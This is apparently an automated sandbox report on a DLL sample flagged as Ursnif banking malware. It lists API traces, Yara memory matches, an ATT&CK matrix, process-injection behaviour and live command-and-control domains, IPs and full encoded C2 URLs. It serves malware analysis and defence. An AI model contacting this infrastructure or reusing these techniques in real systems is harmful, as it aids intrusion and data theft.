          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EA303 cpuid 0_2_013EA303
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102E521 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,0_2_0102E521
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E5C7F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_013E5C7F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E4638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,0_2_013E4638
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EA303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_013EA303

          Stealing of Sensitive Information:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Windows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Valid Accounts1Valid Accounts1DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Access Token Manipulation1Rootkit4Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Process Injection613Masquerading1NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptValid Accounts1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion31DCSyncVirtualization/Sandbox Evasion31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection613Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Regsvr321/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 539453 Sample: 61b85f75e6a7c.dll Startdate: 14/12/2021 Architecture: WINDOWS Score: 100 81 8.8.8.8.in-addr.arpa 2->81 83 1.0.0.127.in-addr.arpa 2->83 109 Found malware configuration 2->109 111 Malicious sample detected (through community Yara rule) 2->111 113 Yara detected  Ursnif 2->113 115 10 other signatures 2->115 9 loaddll32.exe 1 2->9         started        13 mshta.exe 2->13         started        15 mshta.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 97 windows.update3.com 9->97 99 berukoneru.website 9->99 101 2 other IPs or domains 9->101 141 Writes to foreign memory regions 9->141 143 Allocates memory in foreign processes 9->143 145 Modifies the context of a thread in another process (thread injection) 9->145 147 3 other signatures 9->147 19 regsvr32.exe 9->19         started        23 rundll32.exe 9->23         started        25 cmd.exe 1 9->25         started        27 control.exe 9->27         started        29 powershell.exe 13->29         started        32 powershell.exe 15->32         started        34 powershell.exe 17->34         started        36 powershell.exe 17->36         started        signatures6 process7 dnsIp8 85 3.20.161.64, 443, 49792, 49795 AMAZON-02US United States 19->85 87 windows.update3.com 19->87 93 2 other IPs or domains 19->93 117 System process connects to network (likely due to code injection or exploit) 19->117 119 Writes to foreign memory regions 19->119 121 Allocates memory in foreign processes 19->121 129 2 other signatures 19->129 38 control.exe 19->38         started        89 18.219.227.107, 443, 49790, 49793 AMAZON-02US United States 23->89 91 windows.update3.com 23->91 95 2 other IPs or domains 23->95 123 Modifies the context of a thread in another process (thread injection) 23->123 125 Maps a DLL or memory area into another process 23->125 41 control.exe 23->41         started        43 rundll32.exe 1 25->43         started        69 C:\Users\user\AppData\...\jtmpm3o0.cmdline, UTF-8 29->69 dropped 127 Creates a thread in another existing process (thread injection) 29->127 46 csc.exe 29->46         started        53 2 other processes 29->53 49 csc.exe 32->49         started        51 conhost.exe 32->51         started        55 2 other processes 34->55 57 2 other processes 36->57 file9 signatures10 process11 dnsIp12 131 Modifies the context of a thread in another process (thread injection) 41->131 133 Maps a DLL or memory area into another process 41->133 103 berukoneru.website 79.110.52.144, 443, 49812, 49813 V4ESCROW-ASRO Romania 43->103 105 windows.update3.com 43->105 107 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 3.12.124.139, 443, 49789, 49791 AMAZON-02US United States 43->107 135 System process connects to network (likely due to code injection or exploit) 43->135 137 Writes to foreign memory regions 43->137 139 Writes registry values via WMI 43->139 59 control.exe 43->59         started        71 C:\Users\user\AppData\Local\...\jtmpm3o0.dll, PE32 46->71 dropped 61 cvtres.exe 46->61         started        73 C:\Users\user\AppData\Local\...\kon0vos3.dll, PE32 49->73 dropped 63 cvtres.exe 49->63         started        75 C:\Users\user\AppData\Local\...\gmpgobli.dll, PE32 53->75 dropped 77 C:\Users\user\AppData\Local\...\wnczrnms.dll, PE32 55->77 dropped 65 cvtres.exe 55->65         started        79 C:\Users\user\AppData\Local\...\hupbkl0t.dll, PE32 57->79 dropped 67 cvtres.exe 57->67         started        file13 signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          61b85f75e6a7c.dll100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.regsvr32.exe.49d0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
          5.2.rundll32.exe.2b90000.0.unpack100%AviraHEUR/AGEN.1108168Download File
          4.2.rundll32.exe.720000.0.unpack100%AviraHEUR/AGEN.1108168Download File
          0.2.loaddll32.exe.13e0000.1.unpack100%AviraHEUR/AGEN.1108168Download File

          Domains

          SourceDetectionScannerLabelLink
          1.0.0.127.in-addr.arpa0%VirustotalBrowse
          windows.update3.com0%VirustotalBrowse
          8.8.8.8.in-addr.arpa0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://berukoneru.website/tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta0%Avira URL Cloudsafe
          https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf0%Avira URL Cloudsafe
          http://schemas.mic0%URL Reputationsafe
          https://berukoneru.website/tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq0%Avira URL Cloudsafe
          https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom0%Avira URL Cloudsafe
          http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://windows.update3.com/0%Avira URL Cloudsafe
          http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
          https://berukoneru.website/tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta0%Avira URL Cloudsafe
          https://berukoneru.website/tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta0%Avira URL Cloudsafe
          https://berukoneru.website/tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta0%Avira URL Cloudsafe
          https://berukoneru.website/tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta0%Avira URL Cloudsafe
          https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta0%Avira URL Cloudsafe
          https://berukoneru.website/tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta0%Avira URL Cloudsafe
          https://berukoneru.website/tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta0%Avira URL Cloudsafe
          http://crl.microsoftq0%Avira URL Cloudsafe
          https://windows.update3.com/P0%Avira URL Cloudsafe
          https://berukoneru.website/0%Avira URL Cloudsafe
          http://constitution.org/usdeclar.txt0%URL Reputationsafe
          https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta0%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://berukoneru.website/tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta0%Avira URL Cloudsafe
          https://windows.update3.com/i0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          		3.12.124.139
          		truefalse
            		high
            berukoneru.website
            		79.110.52.144
            		truetrue
              		unknown
              1.0.0.127.in-addr.arpa
              		unknown
              		unknowntrueunknown
              windows.update3.com
              		unknown
              		unknowntrueunknown
              8.8.8.8.in-addr.arpa
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://berukoneru.website/tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.etatrue
              • Avira URL Cloud: safe
              		unknown
